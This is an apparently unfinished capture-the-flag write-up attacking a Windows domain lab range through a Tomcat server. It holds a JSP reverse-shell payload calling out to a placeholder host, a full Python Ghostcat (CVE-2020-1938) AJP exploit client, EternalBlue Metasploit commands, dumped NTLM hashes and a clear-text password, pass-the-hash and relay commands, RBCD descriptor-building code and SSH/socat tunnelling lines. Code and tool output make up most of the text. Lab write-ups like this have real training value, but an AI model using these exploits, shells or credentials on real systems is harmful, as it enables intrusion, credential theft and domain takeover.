Spoofing is a medium-difficulty range. Completing it teaches proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement as used in internal-network penetration, deepens the understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 4 flags, spread across different hosts.
flag1 - entry point: Tomcat on 172.22.11.76, port 8080 found by the scan

Directory scan:

```
E:\小工具\ONE-FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan\dirsearch>python dirsearch.py -u http://39.98.127.157:8080/

  dirsearch v0.4.3 (by 鹏组安全)

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714

Output File: /home/fushuling/.dirsearch/reports/39.98.118.194-8080/_23-10-13_07-40-20.txt
Error Log: /home/fushuling/.dirsearch/logs/errors-23-10-13_07-40-20.log

Target: http://39.98.118.194:8080/

[07:40:20] Starting:
[07:40:22] 302 -    0B  - /js  ->  /js/
[07:40:34] 200 -  114B  - /404.html
[07:40:40] 400 -  795B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[07:40:41] 400 -  795B  - /a%5c.aspx
[07:41:14] 302 -    0B  - /css  ->  /css/
[07:41:15] 302 -    0B  - /data  ->  /data/
[07:41:17] 302 -    0B  - /docs  ->  /docs/
[07:41:17] 200 -   17KB - /docs/
[07:41:17] 302 -    0B  - /download  ->  /download/
[07:41:18] 200 -  132B  - /download/
[07:41:20] 302 -    0B  - /examples  ->  /examples/
[07:41:20] 200 -    6KB - /examples/servlets/index.html
[07:41:20] 200 -    1KB - /examples/
[07:41:20] 200 -  658B  - /examples/servlets/servlet/CookieExample
[07:41:20] 200 -  947B  - /examples/servlets/servlet/RequestHeaderExample
[07:41:20] 200 -  682B  - /examples/jsp/snp/snoop.jsp
[07:41:26] 403 -    3KB - /host-manager/
[07:41:26] 403 -    3KB - /host-manager/html
[07:41:27] 302 -    0B  - /images  ->  /images/
[07:41:29] 200 -    7KB - /index.html
[07:41:33] 302 -    0B  - /lib  ->  /lib/
[07:41:37] 302 -    0B  - /manager  ->  /manager/
[07:41:37] 403 -    3KB - /manager/admin.asp
[07:41:37] 403 -    3KB - /manager/
[07:41:37] 403 -    3KB - /manager/login
[07:41:37] 403 -    3KB - /manager/status/all
[07:41:37] 403 -    3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[07:41:37] 403 -    3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[07:41:37] 403 -    3KB - /manager/jmxproxy
[07:41:37] 403 -    3KB - /manager/jmxproxy/?qry=STUFF
[07:41:37] 403 -    3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[07:41:37] 403 -    3KB - /manager/html/
[07:41:37] 403 -    3KB - /manager/VERSION
[07:41:37] 403 -    3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[07:41:37] 403 -    3KB - /manager/html
[07:41:38] 403 -    3KB - /manager/login.asp
[07:41:38] 403 -    3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[07:41:38] 403 -    3KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
[07:41:38] 403 -    3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[07:42:11] 403 -    0B  - /upload/
[07:42:11] 403 -    0B  - /upload
[07:42:12] 403 -    0B  - /upload/b_user.csv
[07:42:12] 403 -    0B  - /upload/loginIxje.php
[07:42:12] 403 -    0B  - /upload/test.txt
[07:42:12] 403 -    0B  - /upload/1.php
[07:42:12] 403 -    0B  - /upload/test.php
[07:42:12] 403 -    0B  - /upload/b_user.xls
[07:42:12] 403 -    0B  - /upload/upload.php
[07:42:12] 403 -    0B  - /upload/2.php
[07:42:12] 200 -    9KB - /user.html

Task Completed
```

Worth noting in the scan: everything under /upload/ answers 403 with an empty body (a protected path, not a missing one) and /manager is forbidden, so the HTTP side alone gives no foothold.
CVE-2020-1938 (Ghostcat, CNVD-2020-10487): Tomcat AJP file read and file inclusion

The AJP connector on 8009 trusts request attributes supplied by the client, so a forged AJP request can make Tomcat serve any file under the webapp root. Read /WEB-INF/web.xml first:

```
E:\小工具\Ghostcat-CNVD-2020-10487>python ajpShooter.py http://39.99.228.210:8080/ 8009 /WEB-INF/web.xml read

  ajpShooter - 00theway, just for test

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489

<!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
  <display-name>Archetype Created Web Application</display-name>
  <security-constraint>
    <display-name>Tomcat Server Configuration Security Constraint</display-name>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>
  <error-page>
    <error-code>403</error-code>
    <location>/error.html</location>
  </error-page>
  <error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/error.html</location>
  </error-page>
  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/HelloServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>LoginServlet</display-name>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>com.example.LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/LoginServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>RegisterServlet</display-name>
    <servlet-name>RegisterServlet</servlet-name>
    <servlet-class>com.example.RegisterServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RegisterServlet</servlet-name>
    <url-pattern>/RegisterServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>UploadTestServlet</display-name>
    <servlet-name>UploadTestServlet</servlet-name>
    <servlet-class>com.example.UploadTestServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadTestServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>DownloadFileServlet</display-name>
    <servlet-name>DownloadFileServlet</servlet-name>
    <servlet-class>com.example.DownloadFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadFileServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
</web-app>
```

Two things in web.xml matter. UploadTestServlet is mapped at /UploadServlet, so files can be uploaded (they land under /upload/). And /upload/* sits behind a security-constraint that requires the admin role, which is why the directory scan got 403 there; that constraint is matched against the HTTP request path, so it does nothing against an AJP include whose request URI is something else entirely.
Upload endpoint: http://39.99.228.210:8080/UploadServlet

Upload the following JSP (it is stored as a .txt, see the path below; the extension does not matter because the file is executed through the AJP include, not requested over HTTP):

```jsp
<%
    // runs a bash reverse shell; the base64 decodes to: bash -i >& /dev/tcp/xxx/xxx 0>&1
    // (xxx/xxx is the attacker host/port placeholder from the original)
    java.io.InputStream in = Runtime.getRuntime()
        .exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgveHh4IDA+JjE=}|{base64,-d}|{bash,-i}")
        .getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while ((a = in.read(b)) != -1) {
        out.println(new String(b, 0, a)); // only the bytes read this round, not the stale buffer tail
    }
    out.print("</pre>");
%>
```

After uploading, run ajpShooter in eval mode against the uploaded path so that Tomcat's JSP servlet compiles and executes it:

```
python ajpShooter.py http://39.99.228.210:8080/ 8009 /upload/a80b42c9eb8e1bf4202c0af1908e479e/20250424012502710.txt eval
```
flag1 obtained.
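The read of /WEB-INF/web.xml and the eval of the uploaded file are the same AJP trick with different include attributes. The following Python is an added example, not ajpShooter's code or anything from the original writeup: it builds the forged AJP13 FORWARD_REQUEST for both modes and parses the container's reply. The server name and the response bytes in the comments are constructed; the Tomcat versions named in the docstring are the ones that fixed CVE-2020-1938.

```python
"""Minimal AJP13 client for the Ghostcat (CVE-2020-1938) include trick.

Added example, not ajpShooter's code. Assumes an unpatched Tomcat AJP connector (before
9.0.31 / 8.5.51 / 7.0.100) on 8009 that accepts client-supplied request attributes.
"""
import socket
import struct

AJP_FORWARD_REQUEST, AJP_METHOD_GET, AJP_REQ_ATTRIBUTE = 2, 2, 0x0A
AJP_SC_REQ_HOST = b"\xa0\x0b"  # 2-byte code AJP uses instead of the literal "Host" header name
RESP_HEADER_CODES = {0xA001: "Content-Type", 0xA002: "Content-Language", 0xA003: "Content-Length",
                     0xA004: "Date", 0xA005: "Last-Modified", 0xA006: "Location", 0xA007: "Set-Cookie",
                     0xA008: "Set-Cookie2", 0xA009: "Servlet-Engine", 0xA00A: "Status", 0xA00B: "WWW-Authenticate"}

def ajp_string(s):
    """AJP string: 2-byte big-endian length, bytes, NUL; length 0xFFFF encodes null."""
    if s is None:
        return b"\xff\xff"
    raw = s.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw + b"\x00"

def read_string(buf, off):
    n = struct.unpack_from(">H", buf, off)[0]
    if n == 0xFFFF:
        return None, off + 2
    return buf[off + 2:off + 2 + n].decode("utf-8", "replace"), off + 3 + n

def client_packet(payload):     # client -> container, magic 0x12 0x34
    return b"\x12\x34" + struct.pack(">H", len(payload)) + payload

def container_packet(payload):  # container -> client, magic "AB"
    return b"AB" + struct.pack(">H", len(payload)) + payload

def forward_request(uri, attributes, server_name="localhost", server_port=8009):
    """JK_AJP13_FORWARD_REQUEST for a GET. Every field, remote_addr and the request
    attributes included, comes from the client; trusting them is the whole bug."""
    p = bytes([AJP_FORWARD_REQUEST, AJP_METHOD_GET])
    p += ajp_string("HTTP/1.1") + ajp_string(uri)
    p += ajp_string("127.0.0.1") + ajp_string("localhost")                    # remote_addr, remote_host
    p += ajp_string(server_name) + struct.pack(">H", server_port) + b"\x00"  # server_name, port, is_ssl
    p += struct.pack(">H", 1) + AJP_SC_REQ_HOST + ajp_string(server_name)    # num_headers=1: Host
    for name, value in attributes:
        p += bytes([AJP_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    return client_packet(p + b"\xff")                                         # request_terminator

def ghostcat_read_request(path):
    """'read': the DefaultServlet serves the include path, so /WEB-INF/web.xml becomes readable."""
    return forward_request("/", [("javax.servlet.include.request_uri", "/"),
                                 ("javax.servlet.include.path_info", path),
                                 ("javax.servlet.include.servlet_path", "/")])

def ghostcat_eval_request(path):
    """'eval': a .jsp URI routes to the JspServlet, which compiles and runs whatever
    include.servlet_path names, whatever its extension (e.g. an uploaded .txt)."""
    return forward_request("/x.jsp", [("javax.servlet.include.request_uri", "/"),
                                      ("javax.servlet.include.servlet_path", path)])

def parse_response(buf):
    """Walk container packets SEND_HEADERS (4), SEND_BODY_CHUNK (3), END_RESPONSE (5).
    Returns (status, headers, body, ended); ended is False while the stream is incomplete."""
    status, headers, body, pos = 0, {}, b"", 0
    while pos + 4 <= len(buf):
        if buf[pos:pos + 2] != b"AB":
            raise ValueError("bad container magic at offset %d" % pos)
        length = struct.unpack_from(">H", buf, pos + 2)[0]
        payload = buf[pos + 4:pos + 4 + length]
        if len(payload) < length:
            break                                   # partial packet: wait for more bytes
        pos += 4 + length
        if payload[0] == 4:
            status = struct.unpack_from(">H", payload, 1)[0]
            _, off = read_string(payload, 3)        # status message
            count = struct.unpack_from(">H", payload, off)[0]
            off += 2
            for _ in range(count):
                code = struct.unpack_from(">H", payload, off)[0]
                if code & 0xFF00 == 0xA000:
                    name, off = RESP_HEADER_CODES.get(code, "0x%04x" % code), off + 2
                else:
                    name, off = read_string(payload, off)
                value, off = read_string(payload, off)
                headers[name] = value
        elif payload[0] == 3:
            n = struct.unpack_from(">H", payload, 1)[0]
            body += payload[3:3 + n]                # a trailing NUL follows the chunk
        elif payload[0] == 5:
            return status, headers, body, True
    return status, headers, body, False

def ghostcat_read(host, path, port=8009, timeout=5.0):
    """Collect the reply; Tomcat keeps the connection open after END_RESPONSE, so stop on that packet."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(ghostcat_read_request(path))
        while True:
            data = s.recv(65536)
            buf += data
            status, headers, body, ended = parse_response(buf)
            if ended or not data:
                return status, headers, body
```

`ghostcat_read("172.22.11.76", "/WEB-INF/web.xml")` reproduces the read step against the range host; swapping in `ghostcat_eval_request` with the uploaded path reproduces the eval step. The parser stops at END_RESPONSE rather than waiting for EOF because Tomcat keeps AJP connections open for reuse.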
Write an SSH public key into root's authorized_keys on 172.22.11.76 so the box can be reached over port 22 with a key instead of the reverse shell (the id_rsa_2048 key used for the tunnel later).
flag2 - MS17-010, 172.22.11.45

Scan the internal /24 from the Tomcat box (the shell there runs as root):

```
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:26:42:7d brd ff:ff:ff:ff:ff:ff
    inet 172.22.11.76/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 315358848sec preferred_lft 315358848sec
    inet6 fe80::216:3eff:fe26:427d/64 scope link
       valid_lft forever preferred_lft forever

Fscan Version: 2.0.0
[2025-04-24 13:35:19] [INFO] Brute-force threads: 1
[2025-04-24 13:35:19] [INFO] Starting information scan
[2025-04-24 13:35:19] [INFO] CIDR range: 172.22.11.0-172.22.11.255
[2025-04-24 13:35:19] [INFO] Generated IP range: 172.22.11.0.%!d(string=172.22.11.255) - %!s(MISSING).%!d(MISSING)
[2025-04-24 13:35:19] [INFO] Parsed CIDR 172.22.11.76/24 -> IP range 172.22.11.0-172.22.11.255
[2025-04-24 13:35:19] [INFO] Final valid host count: 256
[2025-04-24 13:35:19] [INFO] Starting host scan
[2025-04-24 13:35:20] [SUCCESS] Target 172.22.11.6 alive (ICMP)
[2025-04-24 13:35:20] [SUCCESS] Target 172.22.11.76 alive (ICMP)
[2025-04-24 13:35:20] [SUCCESS] Target 172.22.11.26 alive (ICMP)
[2025-04-24 13:35:20] [SUCCESS] Target 172.22.11.45 alive (ICMP)
[2025-04-24 13:35:23] [INFO] Alive hosts: 4
[2025-04-24 13:35:23] [INFO] Valid port count: 233
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.6:135
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.6:139
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.26:135
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.45:135
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.45:139
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.26:139
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.6:88
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.45:445
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.26:445
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.6:445
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.6:389
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.76:22
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.76:8009
[2025-04-24 13:35:23] [SUCCESS] Port open 172.22.11.76:8080
[2025-04-24 13:35:23] [SUCCESS] Service identified 172.22.11.76:22 => [ssh] version: 8.2p1 Ubuntu 4ubuntu0.5 product: OpenSSH OS: Linux info: Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.6:139 => Banner:[.]
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.45:139 => Banner:[.]
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.26:139 => Banner:[.]
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.6:88 =>
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.45:445 =>
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.26:445 =>
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.6:445 =>
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.6:389 =>
[2025-04-24 13:35:28] [SUCCESS] Service identified 172.22.11.76:8009 =>
[2025-04-24 13:35:29] [SUCCESS] Service identified 172.22.11.76:8080 => [http]
[2025-04-24 13:36:28] [SUCCESS] Service identified 172.22.11.6:135 =>
[2025-04-24 13:36:28] [SUCCESS] Service identified 172.22.11.26:135 =>
[2025-04-24 13:36:28] [SUCCESS] Service identified 172.22.11.45:135 =>
[2025-04-24 13:36:28] [INFO] Open ports: 14
[2025-04-24 13:36:28] [INFO] Starting vulnerability scan
[2025-04-24 13:36:28] [INFO] Loaded plugins: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-24 13:36:28] [SUCCESS] NetInfo result  target: 172.22.11.45  hostname: XR-DESKTOP  network interfaces:
[2025-04-24 13:36:28] [SUCCESS] NetInfo result  target: 172.22.11.26  hostname: XR-LCM3AE8B  network interfaces: IPv4: └─ 172.22.11.26
[2025-04-24 13:36:28] [SUCCESS] NetInfo result  target: 172.22.11.6  hostname: XIAORANG-DC  network interfaces: IPv4: └─ 172.22.11.6
[2025-04-24 13:36:28] [SUCCESS] Vulnerability found 172.22.11.45 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-24 13:36:28] [SUCCESS] 172.22.11.26 CVE-2020-0796 SmbGhost Vulnerable
[2025-04-24 13:36:28] [SUCCESS] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[2025-04-24 13:36:28] [SUCCESS] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-24 13:36:28] [SUCCESS] NetBios 172.22.11.6 DC:XIAORANG\XIAORANG-DC
[2025-04-24 13:36:28] [SUCCESS] Web title http://172.22.11.76:8080 status: 200 length: 7091 title: 后台管理
[2025-04-24 13:36:53] [SUCCESS] Scan complete: 26/26
```

Hosts so far:

```
172.22.11.76   already owned (Tomcat, Ubuntu)
172.22.11.45   XR-DESKTOP.xiaorang.lab   MS17-010
172.22.11.26   XIAORANG\XR-LCM3AE8B
172.22.11.6    XIAORANG\XIAORANG-DC      domain controller (88/389 open)
```
Hit EternalBlue first. The session goes through proxychains into 172.22.11.0/24, so a reverse payload would have no route back to us; use a bind payload and connect in through the proxy:

```
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 172.22.11.45
exploit
```
Dump hashes and cached credentials: load kiwi, then hashdump and creds_all (the session is SYSTEM, so LSASS is readable):

```
meterpreter > load kiwi
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > creds_all
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain    NTLM                              SHA1
--------     ------    ----                              ----
XR-DESKTOP$  XIAORANG  578bcc26fbbadeea510280fbfd3859e9  8d91913663e19059d5cfa1e2b2958fd97a407c78
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username     Domain    Password
--------     ------    --------
(null)       (null)    (null)
XR-DESKTOP$  XIAORANG  06 22 fe e0 24 5c 76 04 f3 2c 02 93 08 26 cd 3d 0d 36 b7 75 cf 23 18 a9 3c 0c 02 96 e1 52 5f 2a 4e 88 aa d4 ec 21 6e a2
                       8b 33 3b a8 cf f4 8e bf 2c 75 d0 b9 b9 92 53 65 b2 6c 6f bf 18 06 59 4e c9 7f ff 5a 0f f4 b5 d9 60 eb 3b 63 ed ae dc 45
                       44 cd 4e e8 44 9b 6c 39 ce 2f 6e 12 c8 f7 a3 09 0c 2f a8 89 4a a0 92 29 33 27 0c f8 6c 3a 93 5e 6f 77 95 67 e4 36 1a ba
                       32 df 1a 07 28 39 ca 62 30 66 63 aa e8 57 c0 6b 7f d5 b8 26 a5 da 52 0b 12 2e 6e c0 d0 3b 5c 94 30 d5 a4 c9 7b 24 50 41
                       02 22 e7 20 cf b4 bd 33 54 20 85 53 4d 30 58 76 3d fd e1 87 07 7f 51 9d cb 9f 94 7f 53 3e 9d 97 1a 85 47 51 0c e0 50 6b
                       d3 48 2b e5 b6 9f fe ac 6a 00 da 1d 40 25 f4 96 96 bf a2 b0 aa ac 50 55 ca a5 3b d8 9c ca 39 26 c5 dd 96 d9 da 85 e3 08
yangmei      XIAORANG  xrihGHgoNZQ

kerberos credentials
====================

Username     Domain        Password
--------     ------        --------
(null)       (null)        (null)
xr-desktop$  XIAORANG.LAB  (the same 240-byte hex blob as in the wdigest section above)
xr-desktop$  XIAORANG.LAB  (null)
yangmei      XIAORANG.LAB  xrihGHgoNZQ
```

creds_all gives three usable things: the local Administrator NT hash, the XR-DESKTOP$ machine account password (the 240-byte blob, which is the raw UTF-16 machine password), and a clear-text domain password for yangmei from wdigest.
The msf shell is unreliable, so pass the Administrator NT hash with wmiexec for a proper shell (the LM half is irrelevant and can be zero-filled):

```
proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:48f6da83eb89a4da8a1cc963b855a799 Administrator@172.22.11.45
```

flag02 obtained.

A domain user also fell out of the kiwi output:

```
yangmei  XIAORANG.LAB  xrihGHgoNZQ
```
PetitPotam and WebClient scans with the domain credentials:

```
proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam
proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav
```

The petitpotam module reports hosts that can be coerced.
Attack chain: use PetitPotam against a coercible target that also has the WebClient service running, pointing it at our HTTP listener. The target's WebClient then authenticates to the listener with the machine account's NTLM credentials, and because that authentication originates from HTTP rather than SMB it carries no signing requirement and can be relayed to LDAP on the DC. Relayed as the machine account, we write that computer's own msDS-AllowedToActOnBehalfOfOtherIdentity attribute to list a machine account we control, which gives us resource-based constrained delegation (RBCD): with S4U2Self/S4U2Proxy we can obtain a service ticket to the target as any user, including a domain admin, and authenticate to it. Two caveats: the WebClient only authenticates automatically to a listener it treats as intranet, so the coercion target is given as a short hostname or in the host@80/share form rather than a bare IP; and creating the controlled machine account needs a valid domain account, which yangmei provides as long as ms-DS-MachineAccountQuota has not been lowered.

The WebClient scan shows that only 172.22.11.26 (XR-LCM3AE8B) has the WebClient service running, so it is the only host this chain can take.
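What the relay actually writes in the RBCD step is a security descriptor, not a list of names. As an added example (not code from the writeup, ntlmrelayx or impacket), the Python below builds the self-relative SECURITY_DESCRIPTOR that ends up in msDS-AllowedToActOnBehalfOfOtherIdentity for a given machine-account SID, and parses one back out, which is the check a defender runs when hunting for RBCD backdoors on computer objects. The SIDs are constructed; the 0x000F01FF full-control mask is the value impacket's rbcd helper uses.

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity value used for RBCD.

Added example, not code from the writeup or from impacket. The attribute holds a
self-relative SECURITY_DESCRIPTOR whose DACL lists the principals allowed to act on
behalf of other identities to this computer; an RBCD attack writes an
ACCESS_ALLOWED_ACE for the attacker's machine-account SID. SIDs below are constructed.
"""
import struct
from typing import List, Tuple

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF          # mask impacket's rbcd helper writes for the delegated SID
SD_HEADER = "<BBHIIII"             # Revision, Sbz1, Control, OffsetOwner/Group/Sacl/Dacl
ACL_HEADER = "<BBHHH"              # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"               # AceType, AceFlags, AceSize, Mask


def sid_to_bytes(sid: str) -> bytes:
    """Canonical 'S-1-5-21-...' -> binary SID (the form LDAP stores)."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError(f"not a SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    out = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf: bytes, off: int = 0) -> Tuple[str, int]:
    """Binary SID at buf[off:] -> (canonical string, byte length)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<" + "I" * count, buf, off + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_sd(allowed_sids: List[str], mask: int = FULL_CONTROL) -> bytes:
    """Self-relative SD with only a DACL: one ACCESS_ALLOWED_ACE per SID (no owner/group/SACL)."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), mask) + sid_b
    acl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    # the DACL starts right after the 20-byte header; the other offsets are 0 (absent)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def parse_rbcd_sd(sd: bytes) -> List[Tuple[str, int]]:
    """Return [(sid, mask)] for every ACCESS_ALLOWED_ACE in the DACL; [] if there is no DACL."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, sd, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, sd, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from(ACE_HEADER, sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(sd, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size                 # deny/object ACEs are skipped by their declared size
    return allowed


if __name__ == "__main__":
    # constructed SID: the attacker-added machine account in a made-up domain
    attacker = "S-1-5-21-1111-2222-3333-1105"
    sd = build_rbcd_sd([attacker])
    print(len(sd), "bytes:", sd.hex())
    for sid, mask in parse_rbcd_sd(sd):
        print("allowed to delegate:", sid, "mask=0x%08x" % mask)
```

On the defensive side, pulling msDS-AllowedToActOnBehalfOfOtherIdentity from every computer object over LDAP and feeding the raw bytes to parse_rbcd_sd lists exactly which SIDs may delegate to each host; any SID that is not an expected service account is the backdoor this chain leaves behind.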
The relay listener has to be reachable from inside 172.22.11.0/24, so publish it through the Tomcat box. The ssh line runs on the attacker's VPS (49.233.121.53), the socat line on the Ubuntu box:

```
ssh -i id_rsa_2048 root@39.98.120.46 -D 49.233.121.53:5002 -R \*:79:127.0.0.1:80
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &
```

-D opens a SOCKS proxy on the VPS for proxychains, and -R maps port 79 on the Ubuntu box back to the relay listener on the VPS's port 80. sshd binds remote forwards to loopback unless GatewayPorts is enabled, so socat listens on 0.0.0.0:80 and hands connections to 127.0.0.1:79; the coerced target can then reach the relay at 172.22.11.76:80.
The rest is not finished yet; I'll stop writing here for now.